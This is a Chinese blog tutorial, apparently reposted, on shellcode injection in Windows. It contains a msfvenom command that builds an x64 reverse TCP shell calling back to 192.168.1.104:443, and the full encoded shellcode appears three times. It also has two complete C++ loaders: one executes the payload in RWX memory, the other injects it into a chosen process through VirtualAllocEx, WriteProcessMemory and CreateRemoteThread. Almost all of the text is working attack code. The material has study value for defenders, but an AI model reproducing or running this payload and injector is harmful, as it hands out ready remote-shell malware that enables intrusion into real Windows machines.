标签：x93 xdb xff xd7 x9a 本地 进程 x48 shellcode

这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法

首先生成我们的shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d

root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=50, char=0x61)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of c file: 2138 bytes
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

 这里我们用c++注入本地进程

// ConsoleApplication3.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"


#include "stdafx.h"
#include "Windows.h"

int main()
{
	unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

	void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, buf, sizeof buf);
	((void(*)())exec)();

    return 0;
}

我们来反汇编一下看看这个shellcode是如何在x64机器上面运行的

 下面我们将shellcode注入到指定pid进程

我们构造注入进程c++代码

// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"

int main(int argc, char *argv[])
{
    unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    printf("Injecting to PID: %i", atoi(argv[1]));
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(processHandle);

    return 0;
}

标签：x93,xdb,xff,xd7,x9a,本地,进程,x48,shellcode
来源： https://www.cnblogs.com/-zhong/p/13758119.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。